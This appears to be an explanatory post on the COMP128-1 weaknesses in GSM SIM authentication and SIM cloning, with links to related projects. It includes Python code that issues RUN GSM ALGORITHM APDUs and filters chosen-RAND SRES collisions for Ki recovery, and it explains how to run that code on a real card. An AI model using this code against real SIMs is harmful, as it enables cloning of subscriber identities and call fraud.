These lecture slides, “A3/A8 & COMP128” (Brumley, HUT course T-79.514), describe attacks on the GSM SIM authentication algorithms and SIM (UICC) cloning: http://www.tcs.hut.fi/Studies/T-79.514/slides/S5.Brumley-comp128.pdf
Several interesting points are made:
1. Defects in COMP128-1 (the A3/A8 implementation most operators deployed) let an attacker who can feed the card chosen RAND challenges recover the subscriber key Ki far more cheaply than the design intended. Ki is a symmetric secret shared with the operator's AuC, not a private key. On top of that, the session key was deliberately weakened: COMP128-1 sets the ten low-order bits of the 64-bit Kc to zero, so the A5 encryption effectively runs with a 54-bit key.
2. The attacks need access to the card itself (the SIM in a reader the attacker controls). Early attacks needed about 6 hours of challenges to recover Ki, which is all an attacker needs to clone the SIM. Later, more sophisticated attacks cut that to 16 minutes, and then to under 2 seconds.
Here’s a list of GSM security projects and papers that caught my eye:
Using the SIM Card as a Secure Element in Android: http://nelenkov.blogspot.com/2013/09/using-sim-card-as-secure-element.html
GSM Security Algorithms: http://www.gsma.com/technicalprojects/fraud-security/security-algorithms
Android TelephonyManager.iccExchangeSimIO(), SIM I/O (file-level) access to the SIM/UICC from an app: http://developer.android.com/reference/android/telephony/TelephonyManager.html#iccExchangeSimIO%28int,%20int,%20int,%20int,%20int,%20java.lang.String%29
osmo-sim-auth, running SIM and USIM authentication from Python against a card in a reader: http://openbsc.osmocom.org/trac/wiki/osmo-sim-auth
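As an added example (not code from the slides, from osmo-sim-auth or from any other linked project), here is the card side of the attack described above: the RUN GSM ALGORITHM exchange a 2G SIM answers over raw APDUs (GSM 11.11: A0 88 00 00 10 RAND, status 9F 0C, then GET RESPONSE for SRES(4) || Kc(8)), a check for the zeroed Kc bits that fingerprint COMP128-1, and a filter that picks out of a batch of chosen-RAND responses the pairs the key-recovery attack wants: equal SRES from RANDs that differ only in bytes i and i+8. The `transmit` callable is assumed to have pyscard's shape, `transmit(apdu) -> (data, sw1, sw2)`; `FakeSim` and every RAND, SRES and Kc value are constructed test data, and the 2^16 offline search that turns a collision into Ki[i], Ki[i+8] needs a COMP128-1 implementation that is not included here. A USIM uses the AUTHENTICATE command instead and will reject the A0 class byte.

```python
"""Added example: RUN GSM ALGORITHM over raw APDUs plus a chosen-RAND
collision filter. Assumes transmit(apdu: list[int]) -> (data, sw1, sw2)
as in pyscard; FakeSim and all byte values are constructed test data."""
from itertools import combinations

CLA_GSM = 0xA0               # GSM 11.11 class byte (2G SIM, not USIM)
INS_RUN_GSM_ALGORITHM = 0x88
INS_GET_RESPONSE = 0xC0


def build_run_gsm_apdu(rand: bytes) -> list:
    """A0 88 00 00 10 <RAND[16]>: ask the card to run A3/A8 over RAND."""
    if len(rand) != 16:
        raise ValueError("RAND must be 16 bytes")
    return [CLA_GSM, INS_RUN_GSM_ALGORITHM, 0x00, 0x00, 0x10] + list(rand)


def run_gsm_algorithm(transmit, rand: bytes):
    """Return (SRES, Kc). The card answers 9F 0C; GET RESPONSE then fetches
    the 12 bytes SRES(4) || Kc(8)."""
    data, sw1, sw2 = transmit(build_run_gsm_apdu(rand))
    if sw1 != 0x9F:
        raise RuntimeError("RUN GSM ALGORITHM failed: %02X%02X" % (sw1, sw2))
    data, sw1, sw2 = transmit([CLA_GSM, INS_GET_RESPONSE, 0x00, 0x00, sw2])
    if (sw1, sw2) != (0x90, 0x00) or len(data) != 12:
        raise RuntimeError("GET RESPONSE failed: %02X%02X" % (sw1, sw2))
    return bytes(data[:4]), bytes(data[4:12])


def kc_low_bits_zero(kc: bytes) -> bool:
    """COMP128-1 zeroes the 10 low-order bits of the 64-bit Kc (54 bits of
    entropy left for A5). Kc is big-endian: those bits are all of byte 7
    plus bits 0-1 of byte 6. A consistent True over many RANDs is a strong
    hint that the card runs COMP128-1."""
    return len(kc) == 8 and kc[7] == 0 and (kc[6] & 0x03) == 0


def chosen_rand(base: bytes, i: int, x: int, y: int) -> bytes:
    """RAND equal to base except bytes i and i+8, the pair that COMP128-1's
    early rounds mix only with key bytes Ki[i] and Ki[i+8]."""
    r = bytearray(base)
    r[i], r[i + 8] = x, y
    return bytes(r)


def find_2r_collisions(responses: dict) -> list:
    """responses: RAND -> SRES as returned by the card. Yield (i, rand_a,
    rand_b) for every pair with equal SRES that differs only in bytes i and
    i+8; each is a candidate internal collision that confines Ki[i], Ki[i+8]
    to a 2^16 offline search against a COMP128-1 implementation."""
    by_sres = {}
    for rand, sres in responses.items():
        by_sres.setdefault(sres, []).append(rand)
    hits = []
    for rands in by_sres.values():
        for a, b in combinations(rands, 2):
            diff = {k for k in range(16) if a[k] != b[k]}
            for i in range(8):
                if diff and diff <= {i, i + 8}:
                    hits.append((i, a, b))
    return hits


class FakeSim:
    """Constructed stand-in for a reader-attached card (no A3/A8 inside): it
    returns canned SRES||Kc so the APDU flow can be exercised offline."""
    def __init__(self, sres: bytes, kc: bytes):
        self.result, self.pending, self.log = list(sres + kc), None, []

    def transmit(self, apdu):
        self.log.append(list(apdu))
        if apdu[:2] == [CLA_GSM, INS_RUN_GSM_ALGORITHM] and len(apdu) == 21:
            self.pending = self.result
            return [], 0x9F, 0x0C
        if apdu[:2] == [CLA_GSM, INS_GET_RESPONSE] and self.pending:
            data, self.pending = self.pending, None
            return data, 0x90, 0x00
        return [], 0x6D, 0x00    # INS not supported


def demo() -> dict:
    # Constructed values; a real card derives SRES and Kc from its Ki.
    card = FakeSim(bytes.fromhex("1a2b3c4d"), bytes.fromhex("0123456789abcc00"))
    sres, kc = run_gsm_algorithm(card.transmit, bytes(range(16)))

    base = bytes(range(16))
    sres_a, sres_b = bytes.fromhex("deadbeef"), bytes.fromhex("0badf00d")
    other = bytearray(base)
    other[0], other[5] = 0x01, 0x02          # same SRES, but not an i/i+8 pair
    responses = {
        base: sres_a,
        chosen_rand(base, 3, 0xAA, 0x55): sres_b,   # collides with the next one
        chosen_rand(base, 3, 0x10, 0x20): sres_b,
        bytes(other): sres_b,
    }
    return {"sres": sres, "kc": kc, "weak_kc": kc_low_bits_zero(kc),
            "hits": find_2r_collisions(responses), "apdus": len(card.log)}


if __name__ == "__main__":
    print(demo())
```

To drive a real card, pass `connection.transmit` from pyscard (after `connection.connect()`) in place of `card.transmit`; the collision filter is the cheap part, the cost of the attack is the number of RUN GSM ALGORITHM round trips the card has to answer, which is why the timings in the slides depend on how many challenges each generation of the attack needs.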